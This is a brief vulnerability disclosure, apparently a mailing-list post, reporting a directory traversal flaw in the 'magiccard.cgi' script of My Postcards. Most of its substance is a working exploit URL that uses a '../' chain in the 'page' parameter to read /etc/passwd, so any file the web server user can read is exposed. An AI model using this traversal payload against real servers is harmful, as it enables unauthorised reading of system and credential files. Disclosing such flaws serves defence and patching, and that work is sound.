My Postcards 5,6 vulnerability // magiccard.cgi
-----------------------------------------------

you can read any file on the server, regardless to the HTTP server 
permissions set.
the file must be readable by the user running the HTTPD server.

http://www.xxxxxx.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd

--
cult
simas@kalnieciai.lt